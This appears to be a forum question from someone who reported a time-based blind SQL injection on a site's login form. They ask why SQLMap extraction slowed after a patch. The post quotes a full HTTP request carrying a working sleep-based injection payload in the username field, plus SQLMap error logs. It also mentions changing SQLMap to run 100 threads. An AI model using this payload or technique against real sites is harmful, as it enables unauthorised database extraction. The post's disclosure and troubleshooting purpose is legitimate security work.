sql injection – SQLMap – Invalid character detected. retrying

I recently discovered an time-based blind SQL injection attack on one of the websites. I was able to dump the data with 100 threads (By default, SQLmap doesn’t allow more than 10 but, I modified the source code) running in parallel at a rate of about 30 rows of records an hour.

POST /login HTTP/1.1
Host: somehost.com
Origin: https://somehost.com
Cookie: _session=AWFREYEH345gWwf4yyeGGwtw5ye987p520jwfREWT2qYKUYT43
Upgrade-Insecure-Requests: 1
Referer: https://somehost.com
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 81

username=CvtKevBJ'%2b(select*from(select(sleep(5)))a)%2b'&password=b2R%21e0p%21M5

3 days after I reported the issue, the developers mentioned that they have “applied a patch” and asked me to test again. The issue still existed. The payload above in the username field still caused a 5 second delay in the response however, I could not extract the data with the same rate. It had significantly slowed down to some 3-ish records in 16 hours. SQLMap kept throwing this error:

(10:05:38) (ERROR) invalid character detected. retrying..
(10:05:38) (WARNING) increasing time delay to 23 seconds
(10:05:38) (ERROR) invalid character detected. retrying..
(10:05:38) (WARNING) increasing time delay to 24 seconds
(10:05:38) (ERROR) invalid character detected. retrying..
(10:05:38) (WARNING) increasing time delay to 25 seconds
(10:16:28) (ERROR) invalid character detected. retrying..
(10:16:28) (WARNING) increasing time delay to 26 seconds
(10:17:44) (ERROR) invalid character detected. retrying..
(10:17:44) (WARNING) increasing time delay to 27 seconds

I was wondering what patch it could have been.